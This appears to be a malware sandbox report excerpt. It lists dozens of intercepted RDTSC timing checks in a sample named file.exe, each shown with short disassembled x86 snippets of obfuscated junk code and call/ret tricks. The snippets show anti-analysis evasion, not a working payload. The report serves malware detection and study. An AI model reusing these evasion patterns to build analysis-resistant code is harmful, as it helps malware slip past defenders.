    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A689 second address: 72A695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007EFF192480B6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A695 second address: 72A6A3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007EFF192B60E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A7DD second address: 72A810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007EFF192480B8h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007EFF192480C1h 0x00000013 jmp 00007EFF192480BBh 0x00000018 jmp 00007EFF192480C3h 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72AACD second address: 72AAED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007EFF192B60F6h 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72B054 second address: 72B05B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72249E second address: 7224A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72BB2E second address: 72BB33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72BB33 second address: 72BB4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFF192B60F3h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72BCE4 second address: 72BCEE instructions: 0x00000000 rdtsc 0x00000002 ja 00007EFF192480B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73306F second address: 733073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 733073 second address: 73307C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73212A second address: 73212E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7332A1 second address: 7332A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7374FF second address: 737503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7379AB second address: 7379B7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7379B7 second address: 7379BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7379BD second address: 7379C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 739C77 second address: 739C97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007EFF192B60F8h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A0BF second address: 73A0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A1FF second address: 73A215 instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFF192B60E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007EFF192B60E6h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A215 second address: 73A219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A3B4 second address: 73A3BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A899 second address: 73A8B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A8B2 second address: 73A8C4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFF192B60E8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A8C4 second address: 73A8F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007EFF192480C3h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A8F4 second address: 73A906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebx 0x00000007 push eax 0x00000008 jng 00007EFF192B60F4h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73A906 second address: 73A90A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B3F1 second address: 73B3F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B3F8 second address: 73B3FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B3FE second address: 73B402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B402 second address: 73B406 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B406 second address: 73B461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007EFF192B60EEh 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007EFF192B60E8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D1F10h], edx 0x0000002f push 00000000h 0x00000031 xor esi, dword ptr [ebp+122D5E12h] 0x00000037 push 00000000h 0x00000039 mov edi, dword ptr [ebp+122D2DFDh] 0x0000003f xchg eax, ebx 0x00000040 pushad 0x00000041 js 00007EFF192B60ECh 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B461 second address: 73B478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007EFF192480B8h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007EFF192480BCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73BC48 second address: 73BC60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73CE2E second address: 73CE34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D98B second address: 73D991 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D991 second address: 73D9CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b sub dword ptr [ebp+122D2959h], edi 0x00000011 push 00000000h 0x00000013 mov esi, 28186B0Fh 0x00000018 push 00000000h 0x0000001a add dword ptr [ebp+122D2B2Dh], esi 0x00000020 xchg eax, ebx 0x00000021 pushad 0x00000022 jns 00007EFF192480B8h 0x00000028 push eax 0x00000029 push ebx 0x0000002a pop ebx 0x0000002b pop eax 0x0000002c popad 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jnc 00007EFF192480B6h 0x00000038 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D9CB second address: 73D9D1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E355 second address: 73E359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E359 second address: 73E3E6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007EFF192B60E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007EFF192B60E8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D1FFCh], ebx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007EFF192B60E8h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a or esi, dword ptr [ebp+122D2E4Dh] 0x00000050 mov si, di 0x00000053 jc 00007EFF192B60EEh 0x00000059 push edx 0x0000005a ja 00007EFF192B60E6h 0x00000060 pop edi 0x00000061 push 00000000h 0x00000063 mov esi, dword ptr [ebp+122D2B13h] 0x00000069 xchg eax, ebx 0x0000006a jmp 00007EFF192B60EFh 0x0000006f push eax 0x00000070 pushad 0x00000071 jns 00007EFF192B60ECh 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E3E6 second address: 73E3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E3EE second address: 73E3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73EE8A second address: 73EEE8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFF192480B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007EFF192480B8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 pushad 0x00000029 je 00007EFF192480B9h 0x0000002f movsx ecx, dx 0x00000032 pushad 0x00000033 mov edi, dword ptr [ebp+122D2650h] 0x00000039 and di, 5F49h 0x0000003e popad 0x0000003f popad 0x00000040 push 00000000h 0x00000042 mov dword ptr [ebp+124711A1h], ebx 0x00000048 push 00000000h 0x0000004a mov esi, 1342C22Ah 0x0000004f xchg eax, ebx 0x00000050 pushad 0x00000051 pushad 0x00000052 pushad 0x00000053 popad 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73EEE8 second address: 73EEF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73EEF0 second address: 73EF01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a js 00007EFF192480B6h 0x00000010 pop ecx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7404D1 second address: 7404D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742E1B second address: 742E38 instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFF192480BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jns 00007EFF192480B6h 0x00000016 popad 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742E38 second address: 742E42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007EFF192B60E6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742E42 second address: 742E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 743E24 second address: 743E28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7420DD second address: 7420F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7420F0 second address: 7420F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744DEE second address: 744DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7420F6 second address: 74219C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e call 00007EFF192B60F5h 0x00000013 cmc 0x00000014 pop ebx 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007EFF192B60E8h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 00000015h 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 movzx edi, cx 0x00000039 mov dword ptr [ebp+1244A564h], ecx 0x0000003f mov dword ptr fs:[00000000h], esp 0x00000046 movsx edi, cx 0x00000049 mov eax, dword ptr [ebp+122D0B7Dh] 0x0000004f push 00000000h 0x00000051 push eax 0x00000052 call 00007EFF192B60E8h 0x00000057 pop eax 0x00000058 mov dword ptr [esp+04h], eax 0x0000005c add dword ptr [esp+04h], 0000001Ah 0x00000064 inc eax 0x00000065 push eax 0x00000066 ret 0x00000067 pop eax 0x00000068 ret 0x00000069 js 00007EFF192B60ECh 0x0000006f sbb edi, 4AECE245h 0x00000075 push FFFFFFFFh 0x00000077 mov dword ptr [ebp+122D2469h], eax 0x0000007d push eax 0x0000007e push ecx 0x0000007f push eax 0x00000080 push edx 0x00000081 pushad 0x00000082 popad 0x00000083 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744DF2 second address: 744E00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007EFF192480B6h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 743FB5 second address: 74404E instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFF192B60E8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D1CA2h], edx 0x00000015 mov ebx, dword ptr [ebp+122D33AFh] 0x0000001b push dword ptr fs:[00000000h] 0x00000022 mov di, cx 0x00000025 mov edi, 18EA05BBh 0x0000002a mov dword ptr fs:[00000000h], esp 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007EFF192B60E8h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b add dword ptr [ebp+122D266Dh], edi 0x00000051 mov eax, dword ptr [ebp+122D1015h] 0x00000057 push 00000000h 0x00000059 push eax 0x0000005a call 00007EFF192B60E8h 0x0000005f pop eax 0x00000060 mov dword ptr [esp+04h], eax 0x00000064 add dword ptr [esp+04h], 00000018h 0x0000006c inc eax 0x0000006d push eax 0x0000006e ret 0x0000006f pop eax 0x00000070 ret 0x00000071 add dword ptr [ebp+1244BC44h], eax 0x00000077 push FFFFFFFFh 0x00000079 add edi, 1144499Ah 0x0000007f adc ebx, 50CDC53Ah 0x00000085 push eax 0x00000086 pushad 0x00000087 push eax 0x00000088 push edx 0x00000089 jne 00007EFF192B60E6h 0x0000008f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74404E second address: 74405B instructions: 0x00000000 rdtsc 0x00000002 je 00007EFF192480B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744F5F second address: 744F63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746E78 second address: 746E82 instructions: 0x00000000 rdtsc 0x00000002 js 00007EFF192480B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744F63 second address: 744F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746FDE second address: 746FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746FE2 second address: 746FE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 749064 second address: 749133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jmp 00007EFF192480C5h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007EFF192480B8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 mov ebx, dword ptr [ebp+122D2DB1h] 0x0000002e jmp 00007EFF192480BEh 0x00000033 push dword ptr fs:[00000000h] 0x0000003a call 00007EFF192480BCh 0x0000003f mov di, D311h 0x00000043 pop ebx 0x00000044 add edi, dword ptr [ebp+122D2E9Dh] 0x0000004a mov dword ptr fs:[00000000h], esp 0x00000051 push 00000000h 0x00000053 push ebx 0x00000054 call 00007EFF192480B8h 0x00000059 pop ebx 0x0000005a mov dword ptr [esp+04h], ebx 0x0000005e add dword ptr [esp+04h], 00000016h 0x00000066 inc ebx 0x00000067 push ebx 0x00000068 ret 0x00000069 pop ebx 0x0000006a ret 0x0000006b or dword ptr [ebp+122D1CD0h], eax 0x00000071 mov eax, dword ptr [ebp+122D06C9h] 0x00000077 jmp 00007EFF192480BAh 0x0000007c push FFFFFFFFh 0x0000007e jnc 00007EFF192480BCh 0x00000084 push eax 0x00000085 pushad 0x00000086 push eax 0x00000087 push edx 0x00000088 jmp 00007EFF192480C2h 0x0000008d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 749133 second address: 749145 instructions: 0x00000000 rdtsc 0x00000002 jng 00007EFF192B60E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007EFF192B60ECh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74D6E7 second address: 74D6F1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007EFF192480BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74D6F1 second address: 74D748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jp 00007EFF192B60EEh 0x0000000d push ebx 0x0000000e jbe 00007EFF192B60E6h 0x00000014 pop ebx 0x00000015 nop 0x00000016 add bl, FFFFFFDFh 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007EFF192B60E8h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 mov di, F726h 0x00000039 jbe 00007EFF192B60ECh 0x0000003f mov edi, dword ptr [ebp+1244A580h] 0x00000045 push 00000000h 0x00000047 xor dword ptr [ebp+122D26F7h], eax 0x0000004d xchg eax, esi 0x0000004e push edx 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74D748 second address: 74D74E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E7CD second address: 74E7D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E7D1 second address: 74E7E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007EFF192480B6h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E7E2 second address: 74E7E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74F759 second address: 74F7EE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007EFF192480B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007EFF192480C9h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007EFF192480B8h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c xor bx, BCE8h 0x00000031 jns 00007EFF192480C9h 0x00000037 push edx 0x00000038 jmp 00007EFF192480C1h 0x0000003d pop ebx 0x0000003e push 00000000h 0x00000040 mov bx, cx 0x00000043 push 00000000h 0x00000045 jne 00007EFF192480BCh 0x0000004b or dword ptr [ebp+122D3A3Ch], edi 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007EFF192480C9h 0x00000059 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74D883 second address: 74D926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 mov ebx, dword ptr [ebp+122D2680h] 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007EFF192B60E8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 sbb bx, 39AFh 0x0000003c movzx ebx, cx 0x0000003f mov eax, dword ptr [ebp+122D09FDh] 0x00000045 mov bl, 5Ah 0x00000047 push FFFFFFFFh 0x00000049 push 00000000h 0x0000004b push edx 0x0000004c call 00007EFF192B60E8h 0x00000051 pop edx 0x00000052 mov dword ptr [esp+04h], edx 0x00000056 add dword ptr [esp+04h], 00000014h 0x0000005e inc edx 0x0000005f push edx 0x00000060 ret 0x00000061 pop edx 0x00000062 ret 0x00000063 pushad 0x00000064 mov esi, dword ptr [ebp+1245C7BDh] 0x0000006a mov ecx, dword ptr [ebp+122D2BF1h] 0x00000070 popad 0x00000071 nop 0x00000072 jmp 00007EFF192B60F9h 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a jmp 00007EFF192B60EDh 0x0000007f rdtsc
